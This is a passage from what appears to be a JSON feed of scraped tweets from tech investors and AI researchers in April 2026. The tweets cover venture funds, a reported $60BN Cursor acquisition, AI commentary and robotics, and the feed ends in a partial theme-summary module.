Brynjolfsson", + "title": "RT by @erikbryn: Congratulations to Lab Digital Fellow Angela Aristidou, Digital Fellow @avi_collis, and Research Scientist @d_vidnguyen for being a part of @GoogleAI's inaugural group of global economic scholars!\n\nhttps://ai.google/economy/ai-economy-researchers/", + "url": "https://nitter.net/DigEconLab/status/2047378514240999569#m", + "published_at": "2026-04-23T18:14:10+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: This study is an important part of Vanishing Culture, the new book OUT TODAY from @internetarchive. 🕳️\n\nRead for free or purchase in print ➡️ https://archive.org/details/vanishing-culture-2026", + "url": "https://nitter.net/internetarchive/status/2047378161860776085#m", + "published_at": "2026-04-23T18:12:46+00:00", + "source": "nitter", + "title_zh": "@ylecun转推:这份研究是@internetarchive新书《消失的文化》的重要组成部分。今日发布。免费阅读或购买纸质版 ➡️ https://archive.org/details/vanishing-culture-2026" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I still think on usability-wise, there is a big gap between \"your thing in the training data\" v.s. \"your thing in the SKILL.md\". Prove me wrong otherwise.", + "url": "https://nitter.net/liuliu/status/2047374234004115719#m", + "published_at": "2026-04-23T17:57:10+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Entrepreneurship is a distributed search job across the surface of commercial opportunities", + "url": "https://nitter.net/eladgil/status/2047373700643844303#m", + "published_at": "2026-04-23T17:55:03+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Does the $60BN Cursor Deal Make Sense:\n\n\"It actually makes sense when you look at what each side lacks.\n\nOne has explosive revenue but weak margins due to compute and model costs.\n\nThe other has massive compute and models but no real revenue.\n\nPut them together and it solves both problems.\" @rodriscoll\n\nLove to hear your thoughts on this @levie @ttunguz @matanSF @shaunmmaguire @beffjezos @martin_casado", + "url": "https://nitter.net/HarryStebbings/status/2047371926335857036#m", + "published_at": "2026-04-23T17:48:00+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Big congrats", + "url": "https://nitter.net/eladgil/status/2047365014500389353#m", + "published_at": "2026-04-23T17:20:32+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "My view is the AI boom will only accelerate and is a once in a lifetime transformation\n\nThis is orthogonal to whether many AI companies should exit in next 12-18 months, as some may lack durability vs labs, new entrants, or weird market shifts\n\nhttps://www.businessinsider.com/ai-startup-founders-warning-elad-gilsell-while-boom-lasts-2026-4", + "url": "https://nitter.net/eladgil/status/2047364865527075139#m", + "published_at": "2026-04-23T17:19:56+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "It is a very expensive desire to be a value investor today. \nIt is much easier to be a momentum investor, that is for sure.", + "url": "https://nitter.net/HarryStebbings/status/2047358263868436791#m", + "published_at": "2026-04-23T16:53:42+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "It's been a delight to provide small amounts of advice and suggestions to people working on the Decoupled DiLoCo training system. This approach enables graceful handling of failures in large scale training jobs, by allowing (N-1) / N units to proceed when one fails.\n\nThread ⬇️", + "url": "https://nitter.net/JeffDean/status/2047339995682529313#m", + "published_at": "2026-04-23T15:41:07+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: We launched USVC yesterday and it was one of the most fun days of my career\n\nThousands of people ended up subscribing for literally tens of millions of dollars\n\nWhile most of the reception was positive, there was some interrogation on a few important topics:\n\n1 - The USVC fee structure\n2 - The Investment Strategy\n3 - Support for International Investors\n\nLet's talk about them\n\nThe USVC Fee Structure\n\nIf you have followed me for any amount of time, you'll know this is a personal topic for me.\n\nI've frequently complained about fees in financial services. From VC funds to wealth advisors, I've taken no prisoners in calling these out.\n\nThe last venture capital fund I ran was the only VC fund I know of that raised more than 50M and didn't charge a penny of management fees.\n\nSo how much does USVC actually charge and why it is so much?\n\nUSVC costs 2.5% all-in to investors today\n\nThere are some misconceptions based on reading our prospectus, including:\n\n- A 3% sales load\nPlatforms that offer USVC could charge this if they wanted, but we don't. If you buy on http://USVC.com as everyone yesterday did, you pay no sales load.\n\n- Underlying fund fees\nEarly investments from USVC have been in funds that have their own fees, and these fees are paid by USVC. However, these management fees are already included in the net expense ratio of 2.5%.\n\nIn time, I'm planning to move a meaningful chunk of the portfolio to be direct investments in startups on the cap table which will have 0 underlying fees or carry.\n\nThe 2.5% fee is inclusive of everything, including our management fee.\n\n- The advertised 3.61% today\nRight now, even though you pay 2.5%, it costs us 3.61% to service this product.\n\nThere are two big reasons for this - the underlying fund fees (which we're working to improve with direct investments) and the fact that operationally running these types of funds is very expensive.\n\nWe've decided to absorb the fees excess of 2.5% for at least the first year.\n\nDuring the time, we're going to make more efficient investments and wait for economies of scale to kick in on operational costs.\n\nNow... you may ask: isn't 2.5% still very expensive?\n\nThe answer is... it depends.\n\nTop venture capital firms charge that just on their management fees, and force you to pay that for 10 years.\n\nAnd then they charge 20% of profits on top of that!\n\nWe charge no carry on our direct investments at all, which makes this 2.5% fee attractive for the asset class.\n\nIt's ironic to call this a cash grab when we are subsidizing this product out of our pocket to keep the fees in line\n\nI encourage everyone to go read the full disclosures and prospectus at http://usvc.com.\n\nStay tuned for Part 2 later today on Investment Strategy", + "url": "https://nitter.net/ankurnagpal/status/2047334901033123913#m", + "published_at": "2026-04-23T15:20:52+00:00", + "source": "nitter" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: OH MYG GDOODOISU #moeoverload 🥹", + "url": "https://nitter.net/cuckuke/status/2047325302771061148#m", + "published_at": "2026-04-23T14:42:44+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: The most dangerous thing in Washington right now isn't just the corruption—it's the retaliation against the people who expose it. When government power is used in ways that appear designed to intimidate a journalist for revealing potential abuses, the message is unmistakable: be quiet or be targeted. That’s how fear replaces truth. That’s how a free press is pushed toward silence. And that’s how democracies start to collapse.", + "url": "https://nitter.net/Weinsteinlaw/status/2047321581966291154#m", + "published_at": "2026-04-23T14:27:57+00:00", + "source": "nitter", + "title_zh": "@ylecun转推:华盛顿当下最大的危险不是腐败本身,而是针对揭发者的事后报复。当政府权力被用于恐吓记者揭露潜在滥用行为时,其传递的信息昭然若揭:噤声或遭打击。恐惧扼杀真相,新闻自由逐步消亡,民主社会开始瓦解" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "This is the big f**king deal.\n\nCursor acquired for $60BN by xAI\n\nI sat down with @jasonlk and @rodriscoll to discuss the deal, along with the biggest news in tech this week:\n\n- Anthropic Hits $1TRN in Secondary Markets\n- Anthropic Launches Claude Code\n- Rippling Hits $1BN in ARR\n- Cerebras Files for IPO\n\nMy notes below:\n\n1. This $60B deal actually makes sense\n\nThe potential $60 billion acquisition of Cursor by xAI/SpaceX is an industrial \"marriage made in heaven\". Cursor has an exploding business with billions in ARR but \"shitty\" gross margins because they lack their own compute and models. Elon Musk has the massive Colossus GPU data center and a model (Grok) but effectively no revenue, making the vertical integration of these two companies a strategic fix for both.\n\n2. How Claude Design Will Hurt Figma\n\nAnthropic’s Claude Design is a full design application, not just a set of prompts or skills. It poses an existential threat because it allows product and engineering teams to bypass the traditional 30-day designer turnaround. By enabling \"normal people\" to design and move into production immediately, it will \"maim and nibble\" at Figma’s growth over the coming quarters.\n\n3. I used to think MAUs and WAUs were the dumbest metric. Now I think it's the most important.\n\nIn the B2B world, usage metrics like MAUs, WAUs, and DAUs are now more critical than revenue. If usage isn't growing faster than revenue, it's a sign of a struggling startup or \"stealth churn,\" where users have stopped active engagement despite the company still collecting fees. In the AI age, the ultimate test of a product's value is whether people are actually using its AI features daily.\n\n4. Why the biggest fintech players are in for a shock.\n\nExisting moats for fintech giants like Brex and Ramp are weakening as the selection criteria for vendors shifts. Customers are no longer prioritizing a dashboard's UI; they care which API works best with their autonomous AI agents. If a new vendor offers a superior API that allows an \"AI VP of Finance\" to automate tasks like collections, companies will switch vendors in a single week.\n\n5. Agent fabric is the layer that manages all your agents\n\nThe defining 2027 challenge is the \"agent fabric\". The infrastructure needed to manage and secure hundreds of autonomous agents. This gives a massive advantage to incumbents like Salesforce. They are positioning themselves as the trusted governance layer to guardrail agents and prevent them from going rogue", + "url": "https://nitter.net/HarryStebbings/status/2047316267858645088#m", + "published_at": "2026-04-23T14:06:50+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "R to @HarryStebbings: Spotify 👉 https://open.spotify.com/episode/6EjWkbt83H2WXhDMjjS7PF\nYoutube 👉 https://youtu.be/s61XVZAt5ns\nApple Podcasts 👉 https://podcasts.apple.com/us/podcast/20vc-cursor-acquired-for-%2460bn-by-xai-anthropic-hits/id958230465?i=1000763211245", + "url": "https://nitter.net/HarryStebbings/status/2047316269465006363#m", + "published_at": "2026-04-23T14:06:50+00:00", + "source": "nitter" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "RT by @Ronald_vanLoon: RIVR Delivery #Robot Sits Down to Drop Packages from the Bottom\nby @rivr_tech\n\n#Robotics #Engineering #ArtificialIntelligence #Innovation #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2047215673680490894#m", + "published_at": "2026-04-23T07:27:06+00:00", + "source": "nitter" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "RT by @Ronald_vanLoon: China Deploys Solar #Robot to De-Ice Power Lines in Extreme Mountain Conditions\nby @IntEngineering\n\n#Robotics #Engineering #Innovation #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2047208118723936306#m", + "published_at": "2026-04-23T06:57:05+00:00", + "source": "nitter" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "RT by @Ronald_vanLoon: Treventus Scan #Robot Digitizes Up to 2,500 Pages Per Hour\nby @AadityaAnand_11\n\n#Robotics #Innovation #EmergingTech #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2047199600872665579#m", + "published_at": "2026-04-23T06:23:14+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: Incredible work by Sony published in @Nature today! 🏓\n\nThey’ve built “Ace”, an autonomous ping-pong robot that uses RL and Sony’s vision sensors to achieve expert-level play in ping pong. A huge leap forward for adaptive robotics.\n\nhttps://www.nature.com/articles/s41586-026-10338-5", + "url": "https://nitter.net/hardmaru/status/2047191747793649805#m", + "published_at": "2026-04-23T05:52:02+00:00", + "source": "nitter" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "RT by @Ronald_vanLoon: 12 #AI Terms to Learn\nby @Python_Dv\n\n#ArtificialIntelligence #MachineLearning #ML #MI", + "url": "https://nitter.net/Ronald_vanLoon/status/2047191242535063594#m", + "published_at": "2026-04-23T05:50:01+00:00", + "source": "nitter" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "RT by @Ronald_vanLoon: Antigravity A1: Redefining Aerial Imaging with 8K 360° Panoramic Vision\nby @Insta360Japan\n\n#EmergingTech #Innovation #TechForGood #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2047185500134351287#m", + "published_at": "2026-04-23T05:27:12+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: Full article:\n\nhttps://www.foxnews.com/politics/anthropics-moral-compass-architect-suggested-ai-overcorrection-could-address-historical-injustices", + "url": "https://nitter.net/DavidSacks/status/2047104229773279572#m", + "published_at": "2026-04-23T00:04:16+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Reverse discrimination does not undo historical injustices but rather perpetrates new ones against a different set of individuals. This foments social strife and undermines the ideal of America as a meritocracy. AI models should not be taught that this practice is justified.", + "url": "https://nitter.net/DavidSacks/status/2047103978979119580#m", + "published_at": "2026-04-23T00:03:16+00:00", + "source": "nitter" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "title": "Dev is posting about price", + "url": "https://nitter.net/CryptoCred/status/2047079463750377958#m", + "published_at": "2026-04-22T22:25:51+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "<3 @infisical", + "url": "https://nitter.net/eladgil/status/2047052737762980083#m", + "published_at": "2026-04-22T20:39:39+00:00", + "source": "nitter" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: old pvsm", + "url": "https://nitter.net/ricemoochie/status/2047030091293889009#m", + "published_at": "2026-04-22T19:09:40+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Introducing USVC - a single basket of high-growth venture capital, for everyone. \n\nNo accreditation required, SEC-registered, and a very low $500 minimum. \n\nIncludes OpenAI, Anthropic, xAI, Sierra, Crusoe, Legora, and Vercel. As USVC adds more companies, investors will own a piece of that too. \n\nLiquidity typically comes when companies exit, but we’re aiming to let investors redeem up to 5% of the fund every quarter. This isn’t guaranteed, but if we can make it work, you won’t be locked up like in a traditional venture fund.\n\nIt runs on AngelList, which already supports $125 billion of investor capital. \n\nAnd I’ve joined USVC as the Chairman of its Investment Committee.\n—\n\nGo back to the 1500s, you set sail for the new world to find tons of gold - that was adventure capital. \n\nEarly-stage technology is the modern version. It says we are going to create something new, and it’s risky. It’s daring.\n\nBut ordinary people can’t invest until it’s old, until it’s no longer interesting, until everybody has access to it. By the time a stock IPOs, most of the alpha is gone. The adventure is gone. Public market investors are literally last in line.\n\nThis problem has become farcical in the last decade. Startups are reaching trillion dollar valuations in the private markets while ordinary investors have their noses up to the glass, wondering when they’ll be let in.\n\nInvesting in private markets isn’t easy. You need feet on the ground. You need judgment built over years. Most people don’t have the patience to wait ten or twenty years for an investment to come to fruition.\n\nBut there is no more productive, harder-working way to deploy a dollar than in true venture capital.\n\nUSVC enables you to invest in venture capital in a broad, accessible, professionally-managed way, through a single basket of innovation, focused on high-growth startups, at all stages. \n\nIt is how you bet on the future of tech: the smartest young people in the world, working insane hours, leveraged to the max, with code, hardware, capital, media, and community. Your dollar doesn’t work harder anywhere.\n\nThere is an old line - in the future, either you are telling a computer what to do, or a computer is telling you what to do. You don’t want to be on the wrong side of that transaction.\n\nUSVC lets you buy the future, but you buy it now. Then you wait, and if you are right, you get paid.\n\nGet access here:\n\nhttp://usvc.com", + "url": "https://nitter.net/naval/status/2046991137022648800#m", + "published_at": "2026-04-22T16:34:52+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "Ask Codex about Ulysses attention: wow, you know so much and can help me get this communication+spda thing work!\nAsk Codex to implement a segmented file downloader: didn’t even get the completion block hooked up right.", + "url": "https://nitter.net/liuliu/status/2046986486629986435#m", + "published_at": "2026-04-22T16:16:24+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: Announcing my new thing:\n\nI'm launching a new public venture fund\n\nUSVC is built by AngelList with @naval shaping our investment strategy in the technology companies building our future\n\nAnd unlike traditional venture funds, everyone can invest along with just $500:", + "url": "https://nitter.net/ankurnagpal/status/2046961436593713241#m", + "published_at": "2026-04-22T14:36:51+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 founders over 10 years. If I could only invest in five, this would be them: \n\n1. Nik Storonsky (Revolut) \n\n2. @alanchanguk (Fuse Energy) \n\n3. Adam Foroughi (AppLovin) \n\n4. @awxjack (Airwallex) \n\n5. @MaxJunestrand (Legora)\n\nOk one more… \n\n6. @vladtenev (Robinhood) \n\nPS. No order intended.", + "url": "https://nitter.net/HarryStebbings/status/2046938853445959738#m", + "published_at": "2026-04-22T13:07:07+00:00", + "source": "nitter" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: they're about to start making out", + "url": "https://nitter.net/savanaclavv/status/2046771924064186549#m", + "published_at": "2026-04-22T02:03:48+00:00", + "source": "nitter" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Thanks for coming in today, and for sharing your feedback on my team’s idea!\n\nYour optimistic take on the value that humans will continue to deliver was so refreshing.", + "url": "https://nitter.net/TejuAdeyinka/status/2046761422148018260#m", + "published_at": "2026-04-22T01:22:04+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "What a time to be alive", + "url": "https://nitter.net/eladgil/status/2046722094348771758#m", + "published_at": "2026-04-21T22:45:48+00:00", + "source": "nitter" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: How do AI agents influence knowledge work?\n\n@SuproteemSarkar's (@UChicago) talk at the DEL Seminar Series is now available on YouTube! Moderated by @erikbryn, Sarkar discusses three projects on the Economics of Applied AI.\n\nWatch here: https://youtu.be/4_T4aTLWtwY", + "url": "https://nitter.net/DigEconLab/status/2046698761221783753#m", + "published_at": "2026-04-21T21:13:05+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "👀", + "url": "https://nitter.net/eladgil/status/2046695194054320150#m", + "published_at": "2026-04-21T20:58:54+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 CEOs of the largest companies over the last 10 years. \n\nAdam Foroughi is top 5 I have ever met. Easily. \n\nAppLovin Market Cap: $160BN \n\nRevenue: $5.48BN \n\nEBITDA per Head: $10M\n\nThere is no company on the planet with numbers like AppLovin. \n\nEpisode coming 👇", + "url": "https://nitter.net/HarryStebbings/status/2046684883494600911#m", + "published_at": "2026-04-21T20:17:56+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "The dark alchemy that is loonen sparkling + salt of the earth electrolytes 😱", + "url": "https://nitter.net/eladgil/status/2046674350993223784#m", + "published_at": "2026-04-21T19:36:05+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: My friend @JeffDean encouraged me to speak at this event so come join me on May 26 in San Jose! https://bauplanlabs.github.io/SAO-workshop/", + "url": "https://nitter.net/ceo_clickhouse/status/2046673188193701901#m", + "published_at": "2026-04-21T19:31:28+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "AI for email++", + "url": "https://nitter.net/eladgil/status/2046640542218604783#m", + "published_at": "2026-04-21T17:21:44+00:00", + "source": "nitter" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Excited to speak at my friend @erikbryn’s ECON 295/CS 323\nclass at @Stanford today. Questions?", + "url": "https://nitter.net/saranormous/status/2046637828025835983#m", + "published_at": "2026-04-21T17:10:57+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: The future of computer vision is agentic.\n\n1/ We built Nomadic around a gap we kept seeing in video understanding: VLMs generate chain-of-thought that's fluent and often correct in structure, but weakly grounded in what's actually in the video.\n\nThis limitation shows up in cases like \"rolling stops\". Is the stop sign actually associated with the vehicle’s lane? Does the ego vehicle ever come to a full stop, or only decelerate?", + "url": "https://nitter.net/nomadicai/status/2046635685206208533#m", + "published_at": "2026-04-21T17:02:26+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: Following positive feedback from other venues, like STOC and ICML, NeurIPS is pleased to announce a new initiative in partnership with Google: for NeurIPS 2026, authors will have access to Google's Paper Assistant Tool (PAT) to help improve their submissions. \n\nThis program offers authors the opportunity to receive free, automated, and actionable feedback on their manuscripts before the final deadline, private to the authors. It is a completely optional service that is kept strictly private to the authors and will not be used in the review process.\n\nRead more in our blog post: https://blog.neurips.cc/2026/04/21/neurips-supports-authors-with-googles-paper-assistant-tool-pat/", + "url": "https://nitter.net/NeurIPSConf/status/2046632664493384060#m", + "published_at": "2026-04-21T16:50:26+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: This is insane…\n\nThe Virginia redistricting amendment on the ballot today is framed as a vote to \"restore fairness in the upcoming elections.\"\n\nIn reality, it turns a state that Kamala barely won by 5 pts from 6D-5R to 10D-1R.", + "url": "https://nitter.net/Geiger_Capital/status/2046632586735243420#m", + "published_at": "2026-04-21T16:50:07+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "In a world of agents, how do software providers prevent themselves from becoming valueless databases?\n\n\"The value proposition has to be:\n\n1. How good are your APIs?\n\n2. How well designed are they\n\n3. Are they ready for agents?\n\n4. Can you monetize that in some way?\n\nWe are treating software too much like one monolithic industry.\n\nThere's a lot of categories of software where agents using the tools is a massive boon for the technology as opposed to a dilemma.\" @levie\n\nLove to hear your thoughts on this @Benioff @dharmesh @mcannonbrookes @rauchg @mcuban", + "url": "https://nitter.net/HarryStebbings/status/2046614183513604299#m", + "published_at": "2026-04-21T15:37:00+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "🔥", + "url": "https://nitter.net/eladgil/status/2046375878368940239#m", + "published_at": "2026-04-20T23:50:03+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: Read how Google built custom silicon and infrastructure - and how it's benefiting customers today - in the latest from @Bloomberg. We'll share more updates this week at #GoogleCloudNext. \nhttps://www.bloomberg.com/news/features/2026-04-20/google-eyes-new-chips-to-speed-up-ai-results-challenging-nvidia?srnd=undefined", + "url": "https://nitter.net/ThomasOrTK/status/2046344875994739028#m", + "published_at": "2026-04-20T21:46:52+00:00", + "source": "nitter" + }, + { + "handle": "Svwang1", + "account": "@Svwang1", + "name": "王川", + "title": "很多事情抽象几层之后,就发现底层逻辑是一样的, 而且非常简单。同样的底层逻辑,就可以举一反三,产生组合性和复利。从表象之下抽象出本质,有时会非常费力,因为太多信息迷雾,或者利益相关者搅浑水。所以复利只能在自己有信息优势,看得清楚的地方产生。搅浑水的人有动机用完全错误的信息诱导一批人接受他的错误的逻辑,然后你发现这些错误的逻辑在别的地方不适用,但又不理解是为什么。", + "url": "https://nitter.net/Svwang1/status/2046343776378257515#m", + "published_at": "2026-04-20T21:42:30+00:00", + "source": "nitter" + }, + { + "handle": "Svwang1", + "account": "@Svwang1", + "name": "王川", + "title": "很多慈善机构最后异化成圈钱的工具,用类似的话术来货币化他人的善心。甚至它所有的流程都在表面上都非常合规,但和慈善的精神和最终目的没有太大关系了。所有以 KPI 管理的机构最终都会变成这样。", + "url": "https://nitter.net/Svwang1/status/2046336504407142606#m", + "published_at": "2026-04-20T21:13:36+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: Link to fuller post:\nhttps://substack.com/home/post/p-194229552?source=queue", + "url": "https://nitter.net/eladgil/status/2046300649483374704#m", + "published_at": "2026-04-20T18:51:07+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Here is the sbstack version\n\n\"Random thoughts while gazing at the misty AI Frontier\"\n\nhttps://blog.eladgil.com/p/random-thoughts-while-gazing-at-the", + "url": "https://nitter.net/eladgil/status/2046284381439103043#m", + "published_at": "2026-04-20T17:46:29+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 13/12 Anti-AI regulation & violence will both increase\n\nIt is important for leaders in tech and AI to point out the benefits of AI to society and the world more aggressively", + "url": "https://nitter.net/eladgil/status/2046284194943500453#m", + "published_at": "2026-04-20T17:45:44+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 12/12 Most AI companies should consider exiting in the next 12-18 months", + "url": "https://nitter.net/eladgil/status/2046284191885922498#m", + "published_at": "2026-04-20T17:45:44+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 11/12 AI is about selling work, not software. Units of labor as the product\n\nThis is a big shift in TAM, agents, how to build product in the AI era. Many AI markets are 10-100X the size of their seat based software counterparts", + "url": "https://nitter.net/eladgil/status/2046284190132609299#m", + "published_at": "2026-04-20T17:45:43+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 10/12 Harness creating more and more stickiness to models\n\nIf you look at the use of AI coding tools, the harness (and broader product surface area eg UX, workflow, etc) seems to be increasingly sticky in the short term.\n\nIt is not just the model you use, but the environment, prompting, etc you build around it that helps impact your choice. Brand also matters more then many people think. At some point, either one coding model breaks very far ahead, or they stay neck in neck. How important is the harness/workflow long term for defensibility for coding or enterprise applications?", + "url": "https://nitter.net/eladgil/status/2046284188622737554#m", + "published_at": "2026-04-20T17:45:43+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 9/12 Artisanal engineers will be be increasingly unhappy inside companies.\n\nDeep artisanal “my code is my craft” and “I love creating bespoke things” engineers decreasingly happy in world of AI. Systems thinkers and product thinkers engineers happiest. Many people are a mix of both", + "url": "https://nitter.net/eladgil/status/2046284184877187540#m", + "published_at": "2026-04-20T17:45:42+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: Dwarkesh is not an AGI party bro. He's been pretty diverse in how he seeks alpha from across a wide variety of industries. I enjoy the hell out of a lot of his podcasts.\nThis podcast though, his questions and narrative are very AGI Party takes, because I think they're very low-rank. That's my opinion.", + "url": "https://nitter.net/soumithchintala/status/2046282944139215141#m", + "published_at": "2026-04-20T17:40:46+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "The Jensen + @dwarkesh_sp podcast was fantastic. \nJensen is someone who understood how ecosystems work and someone who understands real-world trade, policy and controls work. And in some deeper sense how AI will actually diffuse into the world.\nIn this podcast, Dwarkesh came off as someone who picked up talking points from an AGI party in the SF Mission District.\nAnd the contrast was so evident.\nAs someone who understood ecosystems relatively deepy, maybe I understood Jensen's take more than others did (idk).\n\nMythos, that Dwarkesh kept bringing up, is not a single absolute turning point in the AI development landscape. Take a state-of-the-art Chinese open-source model, and give it three orders of magnitude more test-time compute + post-training algorithmic advances that haven't been published yet. That's the baseline. It was evident that in whatever bubble Dwarkesh is in, that is seen as a naive or illogical baseline.\n\nWhen AI has such a complex development cycle, it's evident that America needs many levers of policy intervention across multiple layers in a dominant ecosystem that ideally the Western world controls.\n\nThe entire premise that a particular model with AI development will have a critical phase change is neither correct nor does evidence point to it. OpenAI made this point with GPT-4, Anthropic made this point with Mythos, but neither stood / will stand the test of time.\n\nI think Jensen's repeated emphasis within the podcast to try to make this point mostly didn't get Dwarkesh's attention. And Dwarkesh (in this podcast) represents an entire cult of AI researchers and decision-makers that are going to influence policy.\n\nThe thing with policy interventions is that if you do too much too early, you shoot yourself in the foot. There's a good reason American foreign policy and general sanctions of all kinds are measured and continuous.\n\nDespite Jensen's attempt at educating the \"Anthro\" audience how ecosystems work, I'm also not super hopeful a lot of people who've taken the extreme position will change their thought after listening to this podcast. I do think there's a certain religiousness that has permeated some of that community that would make it hard to understand ecosystems at a deeper level.", + "url": "https://nitter.net/soumithchintala/status/2046265830908870983#m", + "published_at": "2026-04-20T16:32:46+00:00", + "source": "nitter" + } + ], + "top_themes": [ + { + "title": "其他", + "count": 169 + }, + { + "title": "模型能力", + "count": 47 + }, + { + "title": "投融资与并购", + "count": 12 + }, + { + "title": "交易与市场", + "count": 11 + }, + { + "title": "算力与芯片", + "count": 9 + } + ], + "modules": { + "themes": [ + { + "id": "t1", + "title": "AI商业化扩展", + "subtitle": "跨云合作与产品多样化", + "bullets": [ + "微软保持核心云合作但扩展多云部署", + "Codex代码生成器更新依赖模型与云端协同", + "GPT-5.5被作为研究工具开放接口" + ], + "samples": [ + { + "text": "we have updated our partnership with microsoft. microsoft will remain our primary cloud partner", + "url": "https://nitter.net/sama/status/2048755148361707946#m", + "handle": "@sama", + "date": "2026-04-27T13:24:26+00:00" + }, + { + "text": "New in the Codex app: - 